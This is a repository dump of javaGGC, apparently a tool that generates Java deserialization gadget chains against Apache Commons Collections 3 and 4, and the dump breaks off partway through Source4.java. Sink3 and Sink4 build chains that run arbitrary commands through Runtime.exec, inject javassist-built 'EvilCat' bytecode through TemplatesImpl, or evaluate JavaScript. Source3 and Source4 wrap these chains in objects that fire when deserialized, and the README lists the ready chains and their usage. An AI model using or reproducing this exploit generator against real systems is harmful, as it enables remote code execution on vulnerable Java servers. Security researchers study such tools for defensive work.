├── javaGGC-0.0.8-jar-with-dependencies.jar
├── .gitignore
├── src
└── main
│ └── java
│ ├── SinkTypeAnnotation.java
│ ├── GGCTest.java
│ ├── SinkResult.java
│ ├── Reflections.java
│ ├── Utils.java
│ ├── Sink3.java
│ ├── Sink4.java
│ ├── Source3.java
│ ├── Source4.java
│ ├── GGC.java
│ └── Main.java
├── LICENSE
├── javaGGC.iml
├── pom.xml
└── README.md
/javaGGC-0.0.8-jar-with-dependencies.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WAY29/javaGGC/HEAD/javaGGC-0.0.8-jar-with-dependencies.jar
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Compiled class file
2 | *.class
3 |
4 | # Log file
5 | *.log
6 |
7 | # BlueJ files
8 | *.ctxt
9 |
10 | # Mobile Tools for Java (J2ME)
11 | .mtj.tmp/
12 |
13 |
14 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
15 | hs_err_pid*
16 |
17 | # idea
18 | .idea/
19 |
20 | # build
21 | target/
22 |
23 |
--------------------------------------------------------------------------------
/src/main/java/SinkTypeAnnotation.java:
--------------------------------------------------------------------------------
1 | import java.lang.annotation.Documented;
2 | import java.lang.annotation.ElementType;
3 | import java.lang.annotation.Inherited;
4 | import java.lang.annotation.Retention;
5 | import java.lang.annotation.RetentionPolicy;
6 | import java.lang.annotation.Target;
7 |
8 | @Documented
9 | @Inherited
10 | @Retention(RetentionPolicy.RUNTIME)
11 | @Target(ElementType.METHOD)
12 | public @interface SinkTypeAnnotation {
13 | String type() default "command";
14 | }
--------------------------------------------------------------------------------
/src/main/java/GGCTest.java:
--------------------------------------------------------------------------------
1 | import java.io.ByteArrayInputStream;
2 | import java.io.ByteArrayOutputStream;
3 | import java.io.ObjectInputStream;
4 | import java.io.ObjectOutputStream;
5 |
6 | public class GGCTest {
7 | public static void main(String[] args) throws Exception {
8 | // Object obj = GGC.CCH5();
9 | //
10 | // ByteArrayOutputStream barr = new ByteArrayOutputStream();
11 | // ObjectOutputStream oos = new ObjectOutputStream(barr);
12 | // oos.writeObject(obj);
13 | // oos.close();
14 | // System.out.print(barr);
15 | //
16 | // try {
17 | // ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
18 | // ois.readObject();
19 | // } catch (Exception e) {
20 | // e.printStackTrace();
21 | // }
22 |
23 | }
24 | }
25 |
--------------------------------------------------------------------------------
/src/main/java/SinkResult.java:
--------------------------------------------------------------------------------
1 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
2 | import org.apache.commons.collections.Transformer;
3 |
4 | enum SinkResultID {
5 | RuntimeExec, TemplatesImplNewTransformer, TemplatesImplTrAXFilter, ScriptEngineManager;
6 | }
7 |
8 | class DefaultConfig {
9 | public static String command = "calc.exe";
10 | public static String code = "java.lang.Runtime.getRuntime().exec(\"calc.exe\");";
11 | }
12 |
13 | public class SinkResult {
14 | public SinkResultID id;
15 | public org.apache.commons.collections.Transformer transformer;
16 | public org.apache.commons.collections4.Transformer transformer4;
17 | public TemplatesImpl templates;
18 |
19 | public SinkResult(SinkResultID id , Transformer transformer, org.apache.commons.collections4.Transformer transformer4, TemplatesImpl templates) {
20 | this.id = id;
21 | this.transformer = transformer;
22 | this.transformer4 = transformer4;
23 | this.templates = templates;
24 | }
25 |
26 | }
27 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2021 Longlone
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/javaGGC.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/src/main/java/Reflections.java:
--------------------------------------------------------------------------------
1 | import java.lang.reflect.Field;
2 | import java.lang.reflect.Method;
3 | import java.util.*;
4 | import java.util.stream.Collectors;
5 |
6 | public class Reflections {
7 | public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
8 | final Field field = getField(obj.getClass(), fieldName);
9 | field.set(obj, value);
10 | }
11 |
12 | public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
13 | final Field field = getField(obj.getClass(), fieldName);
14 | return field.get(obj);
15 | }
16 |
17 | public static List getClassMethods(final Class clazz) throws Exception {
18 | List methodList = Arrays.asList(clazz.getMethods());
19 | List filteredMethodList =
20 | methodList.stream().
21 | filter((Method m) -> m.getParameterTypes().length > 0).
22 | collect(Collectors.toList());
23 |
24 | Collections.sort(filteredMethodList,new Comparator() {
25 | public int compare(Method o1,
26 | Method o2) {
27 | return o1.getName().compareTo(o2.getName());
28 | }
29 | });
30 |
31 | return filteredMethodList;
32 | }
33 |
34 | public static Field getField(final Class clazz, final String fieldName) {
35 | Field field = null;
36 | try {
37 | field = clazz.getDeclaredField(fieldName);
38 | field.setAccessible(true);
39 | } catch (NoSuchFieldException ex) {
40 | if (clazz.getSuperclass() != null)
41 | field = getField(clazz.getSuperclass(), fieldName);
42 | }
43 | return field;
44 | }
45 | }
46 |
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.example
8 | javaGGC
9 | 0.0.8
10 |
11 |
12 |
13 |
14 | maven-assembly-plugin
15 | 3.0.0
16 |
17 |
18 |
19 | Main
20 |
21 |
22 |
23 | jar-with-dependencies
24 |
25 |
26 |
27 |
28 | make-assembly
29 | package
30 |
31 | single
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 | 8
41 | 8
42 |
43 |
44 |
45 |
46 | junit
47 | junit
48 | 4.13.1
49 |
50 |
51 | commons-collections
52 | commons-collections
53 | 3.1
54 |
55 |
56 | org.apache.commons
57 | commons-collections4
58 | 4.0
59 |
60 |
61 | org.javassist
62 | javassist
63 | 3.25.0-GA
64 |
65 |
66 |
67 |
--------------------------------------------------------------------------------
/src/main/java/Utils.java:
--------------------------------------------------------------------------------
1 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
2 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
4 | import javassist.ClassClassPath;
5 | import javassist.ClassPool;
6 | import javassist.CtClass;
7 |
8 | import java.io.File;
9 | import java.io.FileInputStream;
10 | import java.io.IOException;
11 |
12 | public class Utils {
13 | private static TemplatesImpl newTemplatesWithClassBytes(byte[] classBytes) throws Exception {
14 | TemplatesImpl templates = TemplatesImpl.class.newInstance();
15 | Reflections.setFieldValue(templates, "_bytecodes", new byte[][]{classBytes});
16 | // 进入 defineTransletClasses() 方法需要的条件
17 | Reflections.setFieldValue(templates, "_name", "name" + System.nanoTime());
18 | Reflections.setFieldValue(templates, "_class", null);
19 | Reflections.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
20 |
21 | return templates;
22 | }
23 | public static TemplatesImpl generateTemplates(String code) throws Exception {
24 | ClassPool pool = ClassPool.getDefault();
25 | pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
26 | CtClass cc = pool.makeClass("Cat");
27 | // 创建 static 代码块,并插入代码
28 | cc.makeClassInitializer().insertBefore(code);
29 | String randomClassName = "EvilCat" + System.nanoTime();
30 | cc.setName(randomClassName);
31 | cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));
32 | // 转换为bytes
33 | byte[] classBytes = cc.toBytecode();
34 | return newTemplatesWithClassBytes(classBytes);
35 | }
36 |
37 | public static TemplatesImpl generateTemplates(byte[] classBytes) throws Exception {
38 | return newTemplatesWithClassBytes(classBytes);
39 | }
40 |
41 | public static String readFiletoString(String fileName) throws IOException {
42 | return new String(readFileToBytes(fileName), "utf-8");
43 | }
44 |
45 | public static byte[] readFileToBytes(String fileName) throws IOException {
46 | String encoding = "utf-8";
47 | File file = new File(fileName);
48 | Long filelength = file.length();
49 | byte[] filecontent = new byte[filelength.intValue()];
50 | FileInputStream in = new FileInputStream(file);
51 | in.read(filecontent);
52 | in.close();
53 | return filecontent;
54 | }
55 | }
56 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # javaGGC
2 | ***javaGGC for generate commons.collections gadget chain***
3 |
4 | ## Usage
5 | ### javaGGC 0
6 | Use available ggc now!
7 |
8 | CCHx is commons collections 4.x ggc relative to CCx.
9 | ```
10 | Usage: javaGGC version=(3/4) [source=SOURCE_INDEX] [sink=SINK_INDEX] [arg=(command/code, 1 means default, startswith file:// means read code from file)] [test_on_local=(anyValue means yes)]
11 | |
12 | javaGGC 0 [ggc=CC_INDEX/CC_NAME] [arg=(command/code, 1 means default, startswith file:// means read code from file)] [test_on_local=(anyValue means yes)]
13 |
14 | Usage: javaGGC version=(3/4) [source=SOURCE_INDEX] [sink=SINK_INDEX] [arg=(command/code, 1 means default, startswith file:// means read code from file)] [test_on_local=(anyValue means yes)]
15 | |
16 | javaGGC 0 [ggc=CC_INDEX/CC_NAME] [arg=(command/code, 1 means default, startswith file:// means read code from file)] [test_on_local=(anyValue means yes)]
17 |
18 | Available GGC:
19 | [0] CC1 (command)
20 | [1] CC10 (command)
21 | [2] CC11 (code)
22 | [3] CC12 (code)
23 | [4] CC2 (code)
24 | [5] CC3 (code)
25 | [6] CC4 (code)
26 | [7] CC5 (command)
27 | [8] CC6 (command)
28 | [9] CC7 (command)
29 | [10] CC8 (code)
30 | [11] CCH1 (command)
31 | [12] CCH10 (command)
32 | [13] CCH11 (code)
33 | [14] CCH12 (code)
34 | [15] CCH3 (code)
35 | [16] CCH5 (command)
36 | [17] CCH6 (command)
37 | [18] CCH7 (command)
38 | [19] CCH8 (code)
39 | [20] CCK1 (code)
40 | [21] CCK2 (code)
41 | [22] CCK3 (command)
42 | [23] CCK4 (command)
43 | ```
44 | usage: `javaGGC 0 CC1 calc.exe`
45 | ### javaGGC 3/4
46 | Assemble these gadgets into a new ggc chain!
47 | #### javaGGC 3
48 | ```
49 | Usage: javaGGC version=(3/4) [source=SOURCE_INDEX] [sink=SINK_INDEX] [arg=(command/code, 1 means default, startswith file:// means read code from file)] [test_on_local=(anyValue means yes)]
50 | |
51 | javaGGC 0 [ggc=CC_INDEX/CC_NAME] [arg=(command/code, 1 means default, startswith file:// means read code from file)] [test_on_local=(anyValue means yes)]
52 |
53 | Available Source:
54 | [0] AnnotationInvocationHandlerSource (jdk<8u71)
55 | [1] BadAttributeValueExpExceptionSource
56 | [2] HashMapSource
57 | [3] HashSetSource
58 | [4] HashtableSource
59 | Available Sink:
60 | [0] RuntimeExecSink (command)
61 | [1] ScriptEngineManagerSink (code)
62 | [2] TemplatesImplNewTransformerSink (code)
63 | [3] TemplatesImplTrAXFilterSink (code)
64 | ```
65 | usage: `javaGGC 3 0 0 calc.exe`
66 |
67 | #### javaGGC 4
68 | ```
69 | Usage: javaGGC version=(3/4) [source=SOURCE_INDEX] [sink=SINK_INDEX] [arg=(command/code, 1 means default, startswith file:// means read code from file)] [test_on_local=(anyValue means yes)]
70 | |
71 | javaGGC 0 [ggc=CC_INDEX/CC_NAME] [arg=(command/code, 1 means default, startswith file:// means read code from file)] [test_on_local=(anyValue means yes)]
72 |
73 | Available Source:
74 | [0] AnnotationInvocationHandlerSource (jdk<8u71)
75 | [1] BadAttributeValueExpExceptionSource
76 | [2] HashMapSource
77 | [3] HashSetSource
78 | [4] HashtableSource
79 | [5] PriorityQueueSource
80 | [6] TreeBagSource
81 | Available Sink:
82 | [0] RuntimeExecSink (command)
83 | [1] ScriptEngineManagerSink (code)
84 | [2] TemplatesImplNewTransformerSink (code)
85 | [3] TemplatesImplTrAXFilterSink (code)
86 | ```
87 | usage: `javaGGC 4 0 0 calc.exe`
88 |
89 | ## Update
90 | ### V0.0.8
91 | - remove debug output
92 | - refactor RuntimeExecSink argument
93 |
94 | ### V0.0.7
95 | - allow `class://` schema as arg for load custom class
96 | - refactor
97 |
98 | ### V0.0.6
99 | - when the parameter is wrong, output the correct help information and exit
100 | - refactor
101 |
102 | ### V0.0.5
103 | - add sinkResultID for ScriptEngineManagerSink
104 | - fix GGH1, GGH3
105 | - fix a problem: **The payload generated by the repair cannot be used**
106 |
107 | ### V0.0.4
108 | - add AnnotationInvocationHandlerSource for commons collections 4
109 | - add CCH1, CCH3
110 | ### V0.0.3
111 | - add TreeBagSource for commons collections 4
112 |
113 | ## Reference
114 | [CCK Reference](https://github.com/shadowsock5/ysoserial/commit/cb0a3fa7aa8de4563fd4e1c57d45e6cd1ffea971)
--------------------------------------------------------------------------------
/src/main/java/Sink3.java:
--------------------------------------------------------------------------------
1 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
2 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
5 | import javassist.ClassClassPath;
6 | import javassist.ClassPool;
7 | import javassist.CtClass;
8 | import org.apache.commons.collections.Transformer;
9 | import org.apache.commons.collections.functors.ChainedTransformer;
10 | import org.apache.commons.collections.functors.ConstantTransformer;
11 | import org.apache.commons.collections.functors.InstantiateTransformer;
12 | import org.apache.commons.collections.functors.InvokerTransformer;
13 |
14 | import javax.script.ScriptEngineManager;
15 | import javax.xml.transform.Templates;
16 |
17 |
18 | public class Sink3 {
19 | public static SinkResult RuntimeExecSink(Object command) throws Exception {
20 | String realCommand;
21 | if (command instanceof String) {
22 | realCommand = (String) command;
23 | } else {
24 | throw new IllegalArgumentException("[command]: Can't use " + command.getClass() + " as command");
25 | }
26 |
27 | Transformer[] transformers = new Transformer[]{
28 | new ConstantTransformer(Runtime.class),
29 | new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
30 | new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
31 | new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{realCommand}),
32 | };
33 | Transformer transformer = new ChainedTransformer(transformers);
34 |
35 | return new SinkResult(SinkResultID.RuntimeExec, transformer, null, null);
36 | }
37 |
38 | public static SinkResult TemplatesImplTrAXFilterSink(Object code) throws Exception {
39 | TemplatesImpl templates;
40 | if (code instanceof String) {
41 | templates = Utils.generateTemplates((String) code);
42 | } else if (code instanceof byte[]) {
43 | templates = Utils.generateTemplates((byte[]) code);
44 | } else {
45 | throw new IllegalArgumentException("[code]: Can't use " + code.getClass() + " as code");
46 | }
47 |
48 |
49 | Transformer[] transformers = new Transformer[]{
50 | new ConstantTransformer(TrAXFilter.class),
51 | new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates}),
52 | };
53 |
54 | Transformer transformer = new ChainedTransformer(transformers);
55 | return new SinkResult(SinkResultID.TemplatesImplTrAXFilter, transformer, null, templates);
56 | }
57 |
58 | public static SinkResult TemplatesImplNewTransformerSink(Object code) throws Exception {
59 | TemplatesImpl templates;
60 | if (code instanceof String) {
61 | templates = Utils.generateTemplates((String) code);
62 | } else if (code instanceof byte[]) {
63 | templates = Utils.generateTemplates((byte[]) code);
64 | } else {
65 | throw new IllegalArgumentException("[code]: Can't use " + code.getClass() + " as code");
66 | }
67 |
68 | Transformer transformer = new InvokerTransformer("newTransformer", null, null);
69 |
70 | return new SinkResult(SinkResultID.TemplatesImplNewTransformer, transformer, null, templates);
71 | }
72 |
73 | public static SinkResult ScriptEngineManagerSink(Object code) throws Exception {
74 | String realCode;
75 | if (code instanceof String) {
76 | realCode = (String) code;
77 | } else {
78 | throw new IllegalArgumentException("[code]: Can't use " + code.getClass() + " as code");
79 | }
80 |
81 | Transformer[] transformers = new Transformer[]{new ConstantTransformer(ScriptEngineManager.class),
82 | new InvokerTransformer("newInstance", new Class[0], new Object[0]),
83 | new InvokerTransformer("getEngineByName", new Class[]{String.class},
84 | new Object[]{"JavaScript"}), new InvokerTransformer("eval",
85 | new Class[]{String.class}, new String[]{realCode}),
86 | new ConstantTransformer(1)};
87 |
88 | Transformer transformer = new ChainedTransformer(transformers);
89 |
90 | return new SinkResult(SinkResultID.ScriptEngineManager, transformer, null, null);
91 | }
92 |
93 |
94 | }
95 |
--------------------------------------------------------------------------------
/src/main/java/Sink4.java:
--------------------------------------------------------------------------------
1 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
2 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
5 | import javassist.ClassClassPath;
6 | import javassist.ClassPool;
7 | import javassist.CtClass;
8 | import org.apache.commons.collections4.Transformer;
9 | import org.apache.commons.collections4.functors.ChainedTransformer;
10 | import org.apache.commons.collections4.functors.ConstantTransformer;
11 | import org.apache.commons.collections4.functors.InstantiateTransformer;
12 | import org.apache.commons.collections4.functors.InvokerTransformer;
13 |
14 | import javax.script.ScriptEngineFactory;
15 | import javax.script.ScriptEngineManager;
16 | import javax.xml.transform.Templates;
17 | import java.lang.reflect.Field;
18 | import java.util.List;
19 |
20 |
21 | public class Sink4 {
22 | public static SinkResult RuntimeExecSink(Object command) throws Exception {
23 | String realCommand;
24 | if (command instanceof String) {
25 | realCommand = (String) command;
26 | } else {
27 | throw new IllegalArgumentException("[command]: Can't use " + command.getClass() + " as command");
28 | }
29 |
30 |
31 | Transformer[] transformers = new Transformer[]{
32 | new ConstantTransformer(Runtime.class),
33 | new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
34 | new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
35 | new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{realCommand}),
36 | };
37 | Transformer transformer = new ChainedTransformer(transformers);
38 |
39 | return new SinkResult(SinkResultID.RuntimeExec, null, transformer, null);
40 | }
41 |
42 | public static SinkResult TemplatesImplTrAXFilterSink(Object code) throws Exception {
43 | TemplatesImpl templates;
44 | if (code instanceof String) {
45 | templates = Utils.generateTemplates((String) code);
46 | } else if (code instanceof byte[]) {
47 | templates = Utils.generateTemplates((byte[]) code);
48 | } else {
49 | throw new IllegalArgumentException("[code]: Can't use " + code.getClass() + " as code");
50 | }
51 |
52 | Transformer[] transformers = new Transformer[]{
53 | new ConstantTransformer(TrAXFilter.class),
54 | new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates}),
55 | };
56 |
57 | Transformer transformer = new ChainedTransformer(transformers);
58 | return new SinkResult(SinkResultID.TemplatesImplTrAXFilter, null, transformer, templates);
59 | }
60 |
61 | public static SinkResult TemplatesImplNewTransformerSink(Object code) throws Exception {
62 | TemplatesImpl templates;
63 | if (code instanceof String) {
64 | templates = Utils.generateTemplates((String) code);
65 | } else if (code instanceof byte[]) {
66 | templates = Utils.generateTemplates((byte[]) code);
67 | } else {
68 | throw new IllegalArgumentException("[code]: Can't use " + code.getClass() + " as code");
69 | }
70 |
71 | Transformer transformer = new InvokerTransformer("newTransformer", null, null);
72 |
73 | return new SinkResult(SinkResultID.TemplatesImplNewTransformer, null, transformer, templates);
74 | }
75 |
76 | public static SinkResult ScriptEngineManagerSink(Object code) throws Exception {
77 | String realCode;
78 | if (code instanceof String) {
79 | realCode = (String) code;
80 | } else {
81 | throw new IllegalArgumentException("[code]: Can't use " + code.getClass() + " as code");
82 | }
83 |
84 | Transformer[] transformers = new Transformer[]{new ConstantTransformer(ScriptEngineManager.class),
85 | new InvokerTransformer("newInstance", new Class[0], new Object[0]),
86 | new InvokerTransformer("getEngineByName", new Class[]{String.class},
87 | new Object[]{"JavaScript"}), new InvokerTransformer("eval",
88 | new Class[]{String.class}, new String[]{realCode}),
89 | new ConstantTransformer(1)};
90 |
91 | Transformer transformer = new ChainedTransformer(transformers);
92 |
93 | return new SinkResult(SinkResultID.ScriptEngineManager, null, transformer, null);
94 | }
95 | }
96 |
--------------------------------------------------------------------------------
/src/main/java/Source3.java:
--------------------------------------------------------------------------------
1 | import org.apache.commons.collections.Transformer;
2 | import org.apache.commons.collections.functors.ChainedTransformer;
3 | import org.apache.commons.collections.functors.ConstantTransformer;
4 | import org.apache.commons.collections.keyvalue.TiedMapEntry;
5 | import org.apache.commons.collections.map.LazyMap;
6 |
7 | import javax.management.BadAttributeValueExpException;
8 | import java.lang.annotation.Retention;
9 | import java.lang.reflect.Constructor;
10 | import java.lang.reflect.InvocationHandler;
11 | import java.lang.reflect.Proxy;
12 | import java.util.HashMap;
13 | import java.util.HashSet;
14 | import java.util.Hashtable;
15 | import java.util.Map;
16 |
17 | public class Source3 {
18 |
19 | public static InvocationHandler AnnotationInvocationHandlerSource(SinkResult result) throws Exception {
20 | if (result.id == SinkResultID.TemplatesImplNewTransformer) {
21 | throw new IllegalArgumentException("[sink]: Can't use TemplatesImplNewTransformer as sink");
22 | }
23 | Transformer fakeTransformers = generateFakeTransformers();
24 |
25 | Map innerMap = new HashMap();
26 | innerMap.put("value", 1);
27 | Map outerMap = LazyMap.decorate(innerMap, fakeTransformers);
28 |
29 | Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
30 | Constructor constructor = clazz.getDeclaredConstructor(Class.class, Map.class);
31 | constructor.setAccessible(true);
32 | InvocationHandler obj = (InvocationHandler) constructor.newInstance(Retention.class, outerMap);
33 | Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, obj);
34 | obj = (InvocationHandler) constructor.newInstance(Retention.class, proxyMap);
35 |
36 | Reflections.setFieldValue(outerMap, "factory", result.transformer);
37 | return obj;
38 | }
39 |
40 |
41 | public static BadAttributeValueExpException BadAttributeValueExpExceptionSource(SinkResult result) throws Exception {
42 | Transformer fakeTransformers = generateFakeTransformers();
43 |
44 | Map innerMap = new HashMap();
45 | Map outerMap = LazyMap.decorate(innerMap, fakeTransformers);
46 | Object tpl = 1;
47 | if (result.templates != null) {
48 | tpl = result.templates;
49 | }
50 | TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, tpl);
51 |
52 | BadAttributeValueExpException obj = new BadAttributeValueExpException(1);
53 |
54 | try {
55 | Object resultTransformers = Reflections.getFieldValue(result.transformer, "iTransformers");
56 | Reflections.setFieldValue(fakeTransformers, "iTransformers", resultTransformers);
57 | } catch (NullPointerException e) {
58 | Reflections.setFieldValue(outerMap, "factory", result.transformer);
59 | }
60 |
61 | Reflections.setFieldValue(obj, "val", tiedMapEntry);
62 |
63 | return obj;
64 | }
65 |
66 | public static HashMap HashMapSource(SinkResult result) throws Exception {
67 | Transformer fakeTransformers = generateFakeTransformers();
68 |
69 | Map innerMap = new HashMap();
70 | Map outerMap = LazyMap.decorate(innerMap, fakeTransformers);
71 | Object tpl = 1;
72 | if (result.templates != null) {
73 | tpl = result.templates;
74 | }
75 |
76 | TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, tpl);
77 |
78 | HashMap obj = new HashMap();
79 | obj.put(tiedMapEntry, "t");
80 | innerMap.clear();
81 |
82 | Reflections.setFieldValue(outerMap, "factory", result.transformer);
83 |
84 | return obj;
85 | }
86 |
87 | public static HashSet HashSetSource(SinkResult result) throws Exception {
88 | Transformer fakeTransformers = generateFakeTransformers();
89 |
90 | Map innerMap = new HashMap();
91 | Map outerMap = LazyMap.decorate(innerMap, fakeTransformers);
92 | Object tpl = 1;
93 | if (result.templates != null) {
94 | tpl = result.templates;
95 | }
96 |
97 | TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, tpl);
98 |
99 | HashMap hashMap = new HashMap();
100 | hashMap.put(tiedMapEntry, "t");
101 | HashSet obj = new HashSet(hashMap.keySet());
102 | outerMap.clear();
103 |
104 | Reflections.setFieldValue(outerMap, "factory", result.transformer);
105 |
106 | return obj;
107 | }
108 |
109 | public static Hashtable HashtableSource(SinkResult result) throws Exception{
110 | Transformer fakeTransformers = generateFakeTransformers();
111 |
112 | Map innerMap1 = new HashMap();
113 | Map innerMap2 = new HashMap();
114 | Object tpl = 1;
115 | if (result.templates != null) {
116 | tpl = result.templates;
117 | }
118 |
119 | Map lazyMap1 = LazyMap.decorate(innerMap1, fakeTransformers);
120 | lazyMap1.put("yy", tpl);
121 |
122 | Map lazyMap2 = LazyMap.decorate(innerMap2, fakeTransformers);
123 | lazyMap2.put("zZ", tpl);
124 |
125 | Hashtable obj = new Hashtable();
126 | obj.put(lazyMap1, tpl);
127 | obj.put(lazyMap2, tpl);
128 | lazyMap2.remove("yy");
129 |
130 | try {
131 | Object resultTransformers = Reflections.getFieldValue(result.transformer, "iTransformers");
132 | Reflections.setFieldValue(fakeTransformers, "iTransformers", resultTransformers);
133 | } catch (NullPointerException e) {
134 | throw e;
135 | }
136 |
137 | return obj;
138 | }
139 |
140 | private static Transformer generateFakeTransformers() {
141 | return new ChainedTransformer(new Transformer[]{new ConstantTransformer(0)});
142 | }
143 |
144 | }
145 |
--------------------------------------------------------------------------------
/src/main/java/Source4.java:
--------------------------------------------------------------------------------
1 | import org.apache.commons.collections4.Transformer;
2 | import org.apache.commons.collections4.bag.TreeBag;
3 | import org.apache.commons.collections4.comparators.TransformingComparator;
4 | import org.apache.commons.collections4.functors.ChainedTransformer;
5 | import org.apache.commons.collections4.functors.ConstantTransformer;
6 | import org.apache.commons.collections4.keyvalue.TiedMapEntry;
7 | import org.apache.commons.collections4.map.LazyMap;
8 |
9 | import javax.management.BadAttributeValueExpException;
10 | import java.lang.annotation.Retention;
11 | import java.lang.reflect.Constructor;
12 | import java.lang.reflect.InvocationHandler;
13 | import java.lang.reflect.Proxy;
14 | import java.util.*;
15 |
16 | public class Source4 {
17 |
18 | public static InvocationHandler AnnotationInvocationHandlerSource(SinkResult result) throws Exception {
19 | if (result.id == SinkResultID.TemplatesImplNewTransformer) {
20 | throw new IllegalArgumentException("Can't use TemplatesImplNewTransformer as sink");
21 | }
22 | Transformer fakeTransformers = generateFakeTransformers();
23 |
24 | Map innerMap = new HashMap();
25 | innerMap.put("value", 1);
26 | Map outerMap = LazyMap.lazyMap(innerMap, fakeTransformers);
27 |
28 | Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
29 | Constructor constructor = clazz.getDeclaredConstructor(Class.class, Map.class);
30 | constructor.setAccessible(true);
31 | InvocationHandler obj = (InvocationHandler) constructor.newInstance(Retention.class, outerMap);
32 | Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, obj);
33 | obj = (InvocationHandler) constructor.newInstance(Retention.class, proxyMap);
34 |
35 | Reflections.setFieldValue(outerMap, "factory", result.transformer4);
36 |
37 | return obj;
38 | }
39 |
40 | public static PriorityQueue PriorityQueueSource(SinkResult result) throws Exception {
41 |
42 | TransformingComparator comparator = new TransformingComparator(result.transformer4);
43 | PriorityQueue obj = new PriorityQueue(2);
44 | if (result.templates != null) {
45 | Reflections.setFieldValue(obj, "queue", new Object[]{result.templates, 2});
46 | } else {
47 | Reflections.setFieldValue(obj, "queue", new Object[]{1, 2});
48 | }
49 | Reflections.setFieldValue(obj, "size", 2);
50 | Reflections.setFieldValue(obj, "comparator", comparator);
51 |
52 | return obj;
53 | }
54 |
55 | public static BadAttributeValueExpException BadAttributeValueExpExceptionSource(SinkResult result) throws Exception {
56 | Transformer fakeTransformers = generateFakeTransformers();
57 |
58 | Map innerMap = new HashMap();
59 | Map outerMap = LazyMap.lazyMap(innerMap, fakeTransformers);
60 | Object tpl = 1;
61 | if (result.templates != null) {
62 | tpl = result.templates;
63 | }
64 | TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, tpl);
65 |
66 | BadAttributeValueExpException obj = new BadAttributeValueExpException(1);
67 |
68 | try {
69 | Object resultTransformers = Reflections.getFieldValue(result.transformer4, "iTransformers");
70 | Reflections.setFieldValue(fakeTransformers, "iTransformers", resultTransformers);
71 | } catch (NullPointerException e) {
72 | Reflections.setFieldValue(outerMap, "factory", result.transformer4);
73 | }
74 |
75 | Reflections.setFieldValue(obj, "val", tiedMapEntry);
76 |
77 | return obj;
78 | }
79 |
80 | public static HashMap HashMapSource(SinkResult result) throws Exception {
81 | Transformer fakeTransformers = generateFakeTransformers();
82 |
83 | Map innerMap = new HashMap();
84 | Map outerMap = LazyMap.lazyMap(innerMap, fakeTransformers);
85 | Object tpl = 1;
86 | if (result.templates != null) {
87 | tpl = result.templates;
88 | }
89 |
